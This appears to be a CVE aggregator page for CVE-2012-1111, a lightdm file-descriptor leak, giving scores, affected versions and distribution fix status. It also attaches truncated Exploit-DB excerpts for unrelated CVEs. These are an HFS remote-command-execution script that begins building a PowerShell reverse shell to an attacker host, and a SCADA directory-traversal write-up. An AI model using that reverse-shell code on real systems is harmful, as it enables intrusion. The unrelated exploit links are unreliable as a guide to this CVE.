CVE-2012-1111
published 2014-10-27CVE-2012-1111: lightdm before 1.0.9 does not properly close file descriptors before opening a child process, which allows local users to write to the lightdm log or have…
PriorityP415medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EPSS
0.47%
37.1th percentile
lightdm before 1.0.9 does not properly close file descriptors before opening a child process, which allows local users to write to the lightdm log or have other unspecified impact.
Affected
47 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | lightdm | < lightdm 1.0.9-1 (bookworm) | lightdm 1.0.9-1 (bookworm) |
| lightdm_project | lightdm | >= 0 < 1.0.9-1 | 1.0.9-1 |
| lightdm_project | lightdm | >= 0 < 1.0.9-1 | 1.0.9-1 |
| lightdm_project | lightdm | >= 0 < 1.0.9-1 | 1.0.9-1 |
| lightdm_project | lightdm | >= 0 < 1.0.9-1 | 1.0.9-1 |
| robert_ancell | lightdm | <= 1.0.8 | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
| robert_ancell | lightdm | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
osv4.6MEDIUM
vendor_debian4.6MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2012-1111: lightdm - lightdm before 1.0.9 does not properly close file descriptors before opening a c...
vendor_debian·2012·CVSS 4.6
CVE-2012-1111 [MEDIUM] CVE-2012-1111: lightdm - lightdm before 1.0.9 does not properly close file descriptors before opening a c...
lightdm before 1.0.9 does not properly close file descriptors before opening a child process, which allows local users to write to the lightdm log or have other unspecified impact.
Scope: local
bookworm: resolved (fixed in 1.0.9-1)
bullseye: resolved (fixed in 1.0.9-1)
forky: resolved (fixed in 1.0.9-1)
sid: resolved (fixed in 1.0.9-1)
trixie: resolved (fixed in 1.0.9-1)
GHSA
GHSA-hg8g-8g53-j2c8: lightdm before 1
ghsa_unreviewed·2022-05-17
CVE-2012-1111 [MEDIUM] CWE-200 GHSA-hg8g-8g53-j2c8: lightdm before 1
lightdm before 1.0.9 does not properly close file descriptors before opening a child process, which allows local users to write to the lightdm log or have other unspecified impact.
OSV
CVE-2012-1111: lightdm before 1
osv·2014-10-27·CVSS 4.6
CVE-2012-1111 [MEDIUM] CVE-2012-1111: lightdm before 1
lightdm before 1.0.9 does not properly close file descriptors before opening a child process, which allows local users to write to the lightdm log or have other unspecified impact.
No detection rules found.
Exploit-DB
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb·2021-02-23·CVSS 9.8
CVE-2014-6287 [CRITICAL] HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Exploit-DB
Advantech Studio 7.0 - SCADA/HMI Directory Traversal
exploitdb·2012-12-04
CVE-2013-1627 Advantech Studio 7.0 - SCADA/HMI Directory Traversal
Advantech Studio 7.0 - SCADA/HMI Directory Traversal
---
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A
'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.
The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:
.text:00402A4A push 0 ; dwFlagsAndAttributes
.text:00402A4C push 3 ; dwCreationDisposition
.text:00402A4E push 3 ; dwShareMode
.text:00402A50
No writeups or analysis indexed.
http://lists.opensuse.org/opensuse-updates/2012-03/msg00019.htmlhttp://seclists.org/oss-sec/2012/q1/557http://seclists.org/oss-sec/2012/q1/566https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/927060https://bugzilla.novell.com/show_bug.cgi?id=745339http://lists.opensuse.org/opensuse-updates/2012-03/msg00019.htmlhttp://seclists.org/oss-sec/2012/q1/557http://seclists.org/oss-sec/2012/q1/566https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/927060https://bugzilla.novell.com/show_bug.cgi?id=745339
2014-10-27
Published